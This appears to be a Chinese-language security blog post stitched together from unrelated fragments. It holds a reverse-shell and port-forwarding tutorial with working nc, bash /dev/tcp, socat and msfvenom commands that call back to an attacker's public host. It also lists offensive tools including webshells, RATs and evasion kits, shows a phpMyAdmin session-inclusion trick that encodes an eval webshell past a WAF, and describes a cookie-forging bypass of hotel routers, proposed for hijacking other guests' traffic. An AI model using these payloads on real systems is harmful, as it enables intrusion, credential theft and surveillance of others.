2019年8月

在渗透测试过程中,我们经常会用到端口转发,利用代理脚本将内网的流量代理到本地进行访问,这样极大的方便了我们对内网进行横向渗透。最常见的端口转发工具不限于以下几款,大家可以根据在实际测试过程的需要进行选择。

1.png

开门见山

lcx端口转发

前提是在端口转发的时候需要一台公网服务器,lcx是一款轻便的端口转发工具,Lcx程序多用于被控制计算机处于内网的时候,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登录到本机进行管理方便,因此在很多情况下,都会想方设法在被控制计算机上开启3389端口,然后通过lcx等进行端口转发,进而在本地连接到被控制计算机的远程终端并进行管理和使用。在没有端口转发的情况下外网主机是不能直接连接内网主机的,但是lcx工具可以将内网主机(出入内网主机的需要能够ping通互联网)的某个端口抓发到外网的某个端口上面,这样的话处于外网的主机可以将映射到外网的端口再反弹到另一个外网的端口上面(用的最多的是3389),这样我们就可以直接远程连接反弹的端口就可以与内网主机进行通信。故内网已经打通,说实话lcx的工具如同在路由器上面做了端口转发。

2.png

在被控制端执行命令:lcx.exe -slave 192.168.205.1 53 192.168.205.143 3389 //将内网3389端口转发到公网53端口;

在控制端执行命令:lcx.exe -tran 53 1234 //将接收到的53端口反弹到1234端口;

执行完毕后,我们会发现内网的3389已经反弹到公网53端口:

3.png

我们本地远程连接192.168.205.1:1234,就可以访问到内网主机,这样我们就可以远程登陆内网服务器,进行内网的横向扫描(请勿非法使用):

4.png

5.png

nc端口转发

nc这个工具不仅可以反弹端口,也可以作为扫描器使用,在这里我们只是介绍一下端口转发的作用。内网服务器将cmd.exe(就是个shell)主动响应到你电脑的777端口。你再在本地机上监听777端口,这样就进入了对方的cmd了。

我们在分别在内网与公网服务器执行以西命令:

nc -t -e cmd.exe 192.168.205.1 8888 //在内网服务器上面执行此命令,将在公网服务器开启一个cmd的窗口;

nc -lvp 8888 //在公网服务器上面执行此命令,接受来自内网的信息,将信息反馈到公网的8888端口;

当我们端口转发成功后,在公网服务器上面会反弹一个cmd的命令窗口,这个就是内网服务器的,在上面可以执行系统命令,如下图所示:

6.png

7.png

8.png

9.png

socks 代理工具

下面配合实验来介绍一下sockes代理工具,主要涉及reGeorg、Tunna

reGeorg端口转发

reGeorg不用多介绍了,内网渗透中常用工具之一。小白经常用于渗透测试中的内网转发,主要是因为方便实用。这个工具需要配合

proxifier,使用的socks5代理进行运用的。标红的是我们需要的脚本,根据自己的需要结合实际测试环境来选用的。

10.png

首先我们现经代理脚本上传到服务器,实验的环境是jsp的,所以上传代理脚本tunnel.nosocket.jsp,然后我们在浏览器访问一下,如果出现以下提示就说明代理成功。

11.png

上传代理脚本成功后,我们打开proxifier进行配置参数,代理的端口默认是8888,代理的规则我们设置为谷歌浏览器,如果其它的不需要可以去掉勾:

12.png

13.png

上述代理参数配置完毕后,我们在cmd输入一下命令就会出现下面的界面:python2.exe reGeorgSocksProxy.py -p 8888 -uhttp://xxxx:8888/tran.jsp。这样的话我们就把内网的流量代理到外面,我们下一步就可以使用扫描工具进行内网的横向扫描。就这么简单直接。如果内网中的3389只能是内网进行连接的话,我们可以使用mstsc.exe通过代理进行连接3389远程桌面,其它的端口都是一样的道理,灵活运用即可。(仅限学习,切勿在未授权的情况下使用!!!)

14.png

Tunna端口转发

Tunna这个工具使用起来也特方便,脚本的编写也是基于Python2版本。运用的时候也需要我们把代理脚本上传到目标服务器,然后通过代理内网的某个端口,注意这个工具只能代理一个端口,有点局限性。但是我们可以代理3389、22、3306、1433等敏感端口,然后将敏感端口流量转发了外网的的某个端口,我们再通过本地连接外网的端口进行连接,这样的话我们就可以使用了。

15.png

第一步:我们将代理脚本上传到目标服务器,在浏览器访问代理脚本是否被解析:

16.png

第二步:运行proxy.py 并指定端口 python proxy.py -uhttp://192.168.205.143/conn.php -l 1234 -r 3389 -v;

第三步:本地执行rdesktop 127.0.0.1:1234;

reDuh端口转发

reDuh也是一款内网渗透利器,这个工具可以把内网服务器的端口通过http/https隧道转发到本机,形成一个连通回路。用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。服务端是个webshell,工具里面针对不同服务器有aspx,php,jsp三个版本,客户端是java写的,本机执行最好装上JDK软件。

17.png

18.png

我们将代理脚本上传到目标服务器,在本地访问代理脚本

19.png

这样我们执行一下三条命令就可以成功将目标主机的3389端口代理到本地的1234端口,本地连接1234端口就可以登陆内网服务器。

java -jar reDuhClient.jarhttp://somesite.com/reDuh.php

20.png

本地连接1010端口

nc -vv localhost 1010

21.jpg

连接成功会有欢迎提示,之后输入命,在java命令窗口执行

[createTunnel]1234:127.0.0.1:3389

22.png

23.jpg

使用mstsc登录127.0.0.1:1234,到了这一步就算成功了,我们可以根据前期抓取到的登陆密码进行登陆。

24.jpg

25.jpg

由于小白能力有限,其它的sockes代理后续会以实验的形式 再呈现给大家。下面说一一下bash端口转发。

山转一角

Linux一句话端口转发

我们在渗透测试中回经常遇见Linux主机环境,我们将获取到Linux主机的shell为内网渗透的工作之一,但有时候把并不是我们想象的那样简单,毕竟目标主机是处在内网环境中没有公网IP是无法与我们的公网IP进行通信的,中间隔了一道墙这怎么搞?

1、bash直接反弹端口:

bash一句话反弹shell,个人在实际渗透中用的也比较少,但是我看着别人都说还比较方便,那么下面就来看一下,这个bash怎么反弹端口的。

首先我们在我们先在目标主机上面执行命令:bash -i >& >/dev/tcp/公网IP/端口 0>&1;

我们先不看执行的效果如何,分析一下这个命令的含义:

bash -i //意思指的是产生一个bash的交互环境;

>/dev/tcp/公网IP/端口 //大佬们其实一看就明白,就是让内网主机与公网主机的某个端口进行连接;

0>&1 //将标准输入域标准输出内容相结合,然后重定向给前面的标准输出内容;

然后在公网服务器上面执行监听命令,这样的话就能把内网的shell转发到公网服务器:nc -lvvp 端口

26.png

27.jpg

在目标主机上面查看端口信息发现,目标主机与公网IP的8888端口建立了连接,故内网主机的shell反弹到了公网服务器。

27.png

除了bash一句话可以反弹shell,还包括不限于pythonjavaperphp等脚本的一句话,感兴趣的大佬都可以自己去研究一下。小白就不在这里班门弄斧了。

冰雪来袭

socat 反弹一句话

Socat是Linux 下一个多功能的网络工具,它与nc工具差不多,但是看了网上多说人反馈相比NC工具方便的多。为了方便测试,内网主机我们用kali,因为kali上面不用安装,需要在公网IP安装一下。

首先我们在公网上面执行监听9999端口的命令:socat TCP-LISTEN:9999 -

目标主机上面执行以下命令:socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:106.xxx.xxx.115:9999

执行完毕后,公网服务器上面就会出现内网的bash,可以执行系统命令。

28.png

msfvenom 获取反弹一句话

MSF渗透测试框架除了常规的端口扫描、口令爆破、抓包、提权等操作,还可以作为生成一句话反弹shell的工具。我们需要在MSF上面查询到各类的路径信息。本机的服务器有点卡,就不一一列出各类的路径信息。

首先使用bash反弹生成一句话,执行一下命令:msfvenom -p cmd/unix/reverse_bash lhost=MSFIP lport=5555 R 这条命令也可以在自己kaili上面执行生成,只是把IP改为自己的公网IP,本地测试的时候在公网服务器生成的事件特慢,不知道什么原因。

29.png

一定要先在公网服务器监听5555端口,然后把生成的执行语句在目标主机上面进行执行(执行的命令为上个图片中标红的命令)。不然会出错的。

30.png

31.png

接下来我们玩个刺激的,看看powershell能不能行的通?我们搜索搜索一下是不是有powershell这个模块,通过命令查询,果不其然有这个模块,你要知道pwoershell这个渗透测试框架是非常牛逼的,我们在安全测试过程中不仅遇见Lin环境,更多的遇见的是Win环境。废话少数,下面开始测试

msfvenom -l payloads |grep ‘reverse_powershell’ //查询powershell模块的位置

32.png

msfvenom -p cmd/windows/reverse_powershell lhost=106.xxx.xxx.115 lport=8899 r //生成payload,类型是Powershell,标红的一段是需要在目标主机上面执行的命令。

33.png

由于执行的命令太多了,小白在这里就不罗列了,还是那句话,首先在公网服务器上执行监听的命令:

nc -lvvp 8899 //监听本机的8899端口

下面我们在内网服务器上面执行Powershell命令,看看公网上面会不会反弹shell:

34.png

经过测试,发现内网主机的shell已经反弹到了公网服务器,至于红色报错小白猜想可能是内部信息的报错。

35.png

36.png

37.png

漏洞及渗透练习平台:

WebGoat漏洞练习平台:

https://github.com/WebGoat/WebGoat

webgoat-legacy漏洞练习平台:

https://github.com/WebGoat/WebGoat-Legacy

zvuldirll漏洞练习平台:

https://github.com/710leo/ZVulDrill

vulapps漏洞练习平台:

https://github.com/Medicean/VulApps

dvwa漏洞练习平台:

https://github.com/RandomStorm/DVWA

数据库注入练习平台:

https://github.com/Audi-1/sqli-labs

用node编写的漏洞练习平台,like OWASP Node Goat:

https://github.com/cr0hn/vulnerable-node

Ruby编写的一款工具,生成含漏洞的虚拟机:

https://github.com/cliffe/secgen

花式扫描器:

Nmap端口扫描器:

https://github.com/nmap/nmap

本地网络扫描器:

https://github.com/SkyLined/LocalNetworkScanner

子域名扫描器:

https://github.com/lijiejie/subDomainsBrute

https://github.com/aboul3la/Sublist3r

https://github.com/TheRook/subbrute

https://github.com/infosec-au/altdns

linux漏洞扫描:

https://github.com/future-architect/vuls

基于端口扫描以及关联CVE:

https://github.com/m0nad/HellRaiser

漏洞路由扫描器:

https://github.com/jh00nbr/Routerhunter-2.0

迷你批量信息泄漏扫描脚本:

https://github.com/lijiejie/BBScan

Waf类型检测工具:

https://github.com/EnableSecurity/wafw00f

服务器端口弱口令扫描器:

https://github.com/wilson9x1/fenghuangscanner_v3

Fox-scan扫描器:

https://github.com/fengxuangit/Fox-scan/

信息搜集工具:

社工收集器:

https://github.com/n0tr00t/Sreg

Github信息搜集:

https://github.com/sea-god/gitscan

github Repo信息搜集工具:

https://github.com/metac0rtex/GitHarvester

信息探测及扫描工具:

https://github.com/darryllane/Bluto

内部网络信息扫描器:

https://github.com/sowish/LNScan

远程桌面登录扫描器:

https://github.com/linuz/Sticky-Keys-Slayer

网络基础设施渗透工具

https://github.com/SECFORCE/sparta

SNMAP密码破解:

https://github.com/SECFORCE/SNMP-Brute

WEB:

webshell大合集:

https://github.com/tennc/webshell

免杀webshell生成脚本:

https://github.com/yzddmr6/webshell-venom

渗透以及web攻击脚本:

https://github.com/brianwrf/hackUtils

web渗透小工具大合集:

https://github.com/rootphantomer/hacktoolsfor_me

XSS数据接收平台:

https://github.com/firesunCN/BlueLotus_XSSReceiver

XSS与CSRF工具:

https://github.com/evilcos/xssor

xss多功能扫描器:

https://github.com/shawarkhanethicalhacker/BruteXSS

web漏洞扫描器:

https://github.com/andresriancho/w3af

WEB漏洞扫描器:

https://github.com/sullo/nikto

渗透常用小工具包:

https://github.com/leonteale/pentestpackage

web目录扫描器:

https://github.com/maurosoria/dirsearch

web向命令注入检测工具:

https://github.com/stasinopoulos/commix

自动化SQL注入检查工具:

https://github.com/epinna/tplmap

SSL扫描器:

https://github.com/rbsec/sslscan

安全工具集合:

https://github.com/codejanus/ToolSuite

apache日志分析器:

https://github.com/mthbernardes/ARTLAS

php代码审计工具:

https://github.com/pwnsdx/BadCode

web指纹识别扫描:

https://github.com/urbanadventurer/whatweb

检查网站恶意攻击:

https://github.com/ciscocsirt/malspider

wordprees漏洞扫描器:

https://github.com/wpscanteam/wpscan

固件漏洞扫描器:

https://github.com/misterch0c/firminator_backend

数据库注入工具

https://github.com/sqlmapproject/sqlmap

Web代理:

https://github.com/zt2/sqli-hunter

新版中国菜刀:

https://github.com/Chora10/Cknife

git泄露利用EXP:

https://github.com/lijiejie/GitHack

浏览器攻击框架:

https://github.com/beefproject/beef

自动化绕过WAF脚本:

https://github.com/khalilbijjou/WAFNinja

https://github.com/owtf/wafbypasser

一款开源WAF:

https://github.com/SpiderLabs/ModSecurity

http命令行客户端:

https://github.com/jkbrzt/httpie

浏览器调试利器:

https://github.com/firebug/firebug

DISCUZ漏洞扫描器:

https://github.com/code-scan/dzscan

自动化代码审计工具

https://github.com/wufeifei/cobra

浏览器攻击框架:

https://github.com/julienbedard/browsersploit

tomcat自动后门部署:

https://github.com/mgeeky/tomcatWarDeployer

网络空间指纹扫描器:

https://github.com/nanshihui/Scan-T

burpsuit之J2EE扫描插件:

https://github.com/ilmila/J2EEScan

windows域渗透工具:

获取明文及哈希:

https://github.com/gentilkiwi/mimikatz

Powershell渗透库合集:

https://github.com/PowerShellMafia/PowerSploit

Powershell tools合集:

https://github.com/clymb3r/PowerShell

powershell的mimikittenz:

https://github.com/putterpanda/mimikittenz

域渗透教程:

https://github.com/l3m0n/pentest_study

Fuzz:

Web向Fuzz工具

https://github.com/xmendez/wfuzz

HTTP暴力破解,撞库攻击脚本

https://github.com/lijiejie/htpwdScan

漏洞利用及攻击框架:

msf框架:

https://github.com/rapid7/metasploit-framework

pocsscan攻击框架:

https://github.com/erevus-cn/pocscan

Pocsuite攻击框架:

https://github.com/knownsec/Pocsuite

Beebeeto攻击框架:

https://github.com/n0tr00t/Beebeeto-framework

漏洞POC&EXP:

ExploitDB官方git版本:

https://github.com/offensive-security/exploit-database

php漏洞代码分析:

https://github.com/80vul/phpcodz

CVE-2016-2107:

https://github.com/FiloSottile/CVE-2016-2107

CVE-2015-7547 POC:

https://github.com/fjserna/CVE-2015-7547

JAVA反序列化POC生成工具:

https://github.com/frohoff/ysoserial

JAVA反序列化EXP:

https://github.com/foxglovesec/JavaUnserializeExploits

Jenkins CommonCollections EXP:

https://github.com/CaledoniaProject/jenkins-cli-exploit

CVE-2015-2426 EXP (windows内核提权):

https://github.com/vlad902/hacking-team-windows-kernel-lpe

use docker to show web attack(php本地文件包含结合phpinfo getshell 以及ssrf结合curl的利用演示):

https://github.com/hxer/vulnapp

php7缓存覆写漏洞Demo及相关工具:

https://github.com/GoSecure/php7-opcache-override

XcodeGhost木马样本:

https://github.com/XcodeGhostSource/XcodeGhost

中间人攻击及钓鱼

中间人攻击框架:

https://github.com/secretsquirrel/the-backdoor-factory

https://github.com/secretsquirrel/BDFProxy

https://github.com/byt3bl33d3r/MITMf

Inject code, jam wifi, and spy on wifi users:

https://github.com/DanMcInerney/LANs.py

中间人代理工具:

https://github.com/intrepidusgroup/mallory

wifi钓鱼:

https://github.com/sophron/wifiphisher

密码破解:

密码破解工具:

https://github.com/shinnok/johnny

本地存储的各类密码提取利器:

https://github.com/AlessandroZ/LaZagne

二进制及代码分析工具:

二进制分析工具

https://github.com/devttys0/binwalk

系统扫描器

https://github.com/quarkslab/binmap

rp:

https://github.com/0vercl0k/rp

Windows Exploit Development工具

https://github.com/lillypad/badger

二进制静态分析工具(python):
https://github.com/bdcht/amoco

Python Exploit Development Assistance for GDB:

https://github.com/longld/peda

对BillGates Linux Botnet系木马活动的监控工具

https://github.com/ValdikSS/billgates-botnet-tracker

木马配置参数提取工具:

https://github.com/kevthehermit/RATDecoders

Shellphish编写的二进制分析工具(CTF向):

https://github.com/angr/angr

针对python的静态代码分析工具:

https://github.com/yinwang0/pysonar2

一个自动化的脚本(shell)分析工具,用来给出警告和建议:

https://github.com/koalaman/shellcheck

基于AST变换的简易Javascript反混淆辅助工具:

https://github.com/ChiChou/etacsufbo

EXP编写框架及工具:

二进制EXP编写工具:

https://github.com/t00sh/rop-tool

CTF Pwn 类题目脚本编写框架:

https://github.com/Gallopsled/pwntools

an easy-to-use io library for pwning development:

https://github.com/zTrix/zio

跨平台注入工具:

https://github.com/frida/frida

哈希长度扩展攻击EXP:

https://github.com/citronneur/rdpy

隐写:

隐写检测工具

https://github.com/abeluck/stegdetect

各类安全资料:
data_hacking合集:

https://github.com/ClickSecurity/data_hacking

mobile-security-wiki:

https://github.com/exploitprotocol/mobile-security-wiki

书籍《reverse-engineering-for-beginners》:

https://github.com/veficos/reverse-engineering-for-beginners

一些信息安全标准及设备配置:

https://github.com/luyg24/IT_security

APT相关笔记:

https://github.com/kbandla/APTnotes

Kcon资料:

https://github.com/knownsec/KCon

《DO NOT FUCK WITH A HACKER》:

https://github.com/citypw/DNFWAH

各类安全脑洞图:

https://github.com/phith0n/Mind-Map

信息安全流程图:

https://github.com/SecWiki/sec-chart/ tree/294d7c1ff1eba297fa892dda08f3c05e90ed1428

各类CTF资源

近年ctf writeup大全:

https://github.com/ctfs/write-ups-2016

https://github.com/ctfs/write-ups-2015

https://github.com/ctfs/write-ups-2014

fbctf竞赛平台Demo:

https://github.com/facebook/fbctf

ctf Resources:

https://github.com/ctfs/resources

ctf及黑客资源合集:

https://github.com/bt3gl/My-Gray-Hacker-Resources

ctf和安全工具大合集:

https://github.com/zardus/ctf-tools

ctf向 python工具包

https://github.com/P1kachu/v0lt

各类编程资源:

大礼包(什么都有):

https://github.com/bayandin/awesome-awesomeness

bash-handbook:

https://github.com/denysdovhan/bash-handbook

python资源大全:

https://github.com/jobbole/awesome-python-cn

git学习资料:

https://github.com/xirong/my-git

安卓开源代码解析

https://github.com/android-cn/android-open-project

python框架,库,资源大合集:

https://github.com/vinta/awesome-python

JS 正则表达式库(用于简化构造复杂的JS正则表达式):

https://github.com/VerbalExpressions/JSVerbalExpressions

Python:

python 正则表达式库(用于简化构造复杂的python正则表达式):

https://github.com/VerbalExpressions/

python任务管理以及命令执行库:

https://github.com/pyinvoke/invoke

python exe打包库:

https://github.com/pyinstaller/pyinstaller

Veil-Evasion免杀项目:

https://github.com/Veil-Framework/Veil-Evasion

py3 爬虫框架:

https://github.com/orf/cyborg

一个提供底层接口数据包编程和网络协议支持的python库:

https://github.com/CoreSecurity/impacket

python requests 库:

https://github.com/kennethreitz/requests

python 实用工具合集:

https://github.com/mahmoud/boltons

python爬虫系统:

https://github.com/binux/pyspider

福利:

微信自动抢红包动态库

https://github.com/east520/AutoGetRedEnv

微信抢红包插件(安卓版)

https://github.com/geeeeeeeeek/WeChatLuckyMoney

hardsed神器:

https://github.com/yangyangwithgnu/hardseed

甲方安全工程师生存指南

web索引及日志搜索工具:

https://github.com/thomaspatzke/WASE

开源日志采集器:

https://github.com/wgliang/logcool

扫描CS结构的web debuger

https://github.com/Kozea/wdb

恢复sqlite数据库删除注册信息:

https://github.com/aramosf/recoversqlite/

gps欺骗检测工具:

https://github.com/zxsecurity/gpsnitch

应急处置响应框架:

https://github.com/biggiesmallsAG/nightHawkResponse

web安全开发指南:

https://github.com/FallibleInc/security-guide-for-developers

各个知名厂商漏洞测试报告模板:

https://github.com/juliocesarfort/public-pentesting-reports

linux下恶意代码检测包:

https://github.com/rfxn/linux-malware-detect

操作系统运行指标可视化框架:

https://github.com/facebook/osquery

恶意代码分析系统:

https://github.com/cuckoosandbox/cuckoo

定期搜索及存储web应用:

https://github.com/Netflix/Scumblr

事件响应框架:

https://github.com/google/grr

综合主机监控检测平台:

https://github.com/ossec/ossec-hids

分布式实时数字取证系统:

https://github.com/mozilla/mig

Microsoft & Unix 文件系统及硬盘取证工具:

https://github.com/sleuthkit/sleuthkit

蜜罐:

SSH蜜罐:

https://github.com/desaster/kippo

蜜罐集合资源:

https://github.com/paralax/awesome-honeypots

kippo进阶版蜜罐:

https://github.com/micheloosterhof/cowrie

SMTP 蜜罐:

https://github.com/awhitehatter/mailoney

web应用程序蜜罐:

https://github.com/mushorg/glastopf

数据库蜜罐:

https://github.com/jordan-wright/elastichoney

web蜜罐:

https://github.com/atiger77/Dionaea

远控:
用gmail充当C&C服务器的后门

https://github.com/byt3bl33d3r/gcat

开源的远控:

https://github.com/UbbeLoL/uRAT

c#远控:

https://github.com/hussein-aitlahcen/BlackHole

对于phpmyadmin来说有一种特殊的机制,所有SQL的执行操作将存入session

所以这有了一种更加简单的办法,直接进行SQL查询来插入恶意语句。

选好了方向就开始干活了,又遇到一个小问题,这台机器可能开了一些安全服务。直接传入$_POST $_GET 这种直接给你转成小写了。如果传入数据还有eval,立马封IP,有点狠,但是问题不大,可以曲线救国一下,将<?eval($_GET[1]);?>编码后再解码写入。

1.png

再包含一下session,使得刚刚的代码能过执行。先找一下session的具体位置,从phpinfo中可知,session的sava_path为空,那就是默认tmp了。

常见session存放位置:(phpsessid可从cookie中看到)

/var/lib/php/sess_PHPSESSID  
/tmp/sess_PHPSESSID  
/tmp/sessions/sess_PHPSESSID

可看到成功包含。

2.png

晚上住进了某家酒店,闲来无事,连个 wifi,发现居然没网。

看了一下路由器,电源 ok,网线 ok,灯 ok ,就是网络不 ok。

1.png

那么就访问一下 wifi 的管理后台看看,先查看自己电脑 IP,获取网关地址。

2.png

访问一下,看到了 wifi 后台的登录页面。
http://192.168.125.1/local/login.html

3.png

随便测了一下,发现登录时错误回显不一致,参数值用了 md5 算法加密传输,不过依然可以爆破账号,在这里这个不是重点,就不试了 手工试了了试,没猜出来 ヽ(ー_ー)ノ

一.发现端倪

抓包时发现,登录的响应包内容是这样的。

<html>
<head>
<title>My Title</title><link rel="stylesheet" href="/style/normal_ws.css"       type="text/css"><meta http-equiv="content-type" content="text/html; charset=utf-8">
</head>
<body>
status=-1,superuser=-1,session=</body>
</html>

4.png

二.猜测

看到响应包的 这个东西,很容易想到跟 cookie 非常相似。

status=-2,superuser=-1,session=

而且在不登录的情况下,怎么访问登录页面都是没有cookie的。

那么假设它就是(服务器端)返回给客户端(前端)的一个 cookie,看参数名也容易知道一些含义

5.png

三.开始动手

1、开拦截,抓取登录的响应包。

6.png

2、修改登录的响应包,如下,然后放行。

7.png

3、可以看到它请求了一个 http://192.168.125.1/local/home.asp 页面。看文件名也知道进入到后台的主页了。

8.png

4、成功进入,如下:

9.png

5、此过程的全部请求

10.png

四.直接来伪造 COOKIE

前提

通过前面的 一顿操作(猛如虎),结果登录页面不见了。

我们知道了

1、正确的超管用户名 admin

2、后台主页的地址 http://192.168.125.1/local/home.asp

3、正确的 cookie (固定不变的,也是猜出来的) status=1,superuser=1,session=1

见证奇迹的时刻

先访问登录页面,利用 EditThisCookie 插件增加(修改) cookie。如下

11.png

然后再访问后台主页 URL

12.png

那么我们就进来了

13.png

该漏洞的利用思路

首先该漏洞可以到达无需密码登录 wifi 管理后台页面的效果。

其实每个房间都有一个 wifi(路由器),我们可以利用同样的方法去进到别的房间 wifi 的管理后台。进而进行 DNS 劫持,流量监控等。运行好的话,就可以得到一些敏感的东西(如账号密码,交易密码等)。

另外就是进一步对交换机和网管设备进行攻击。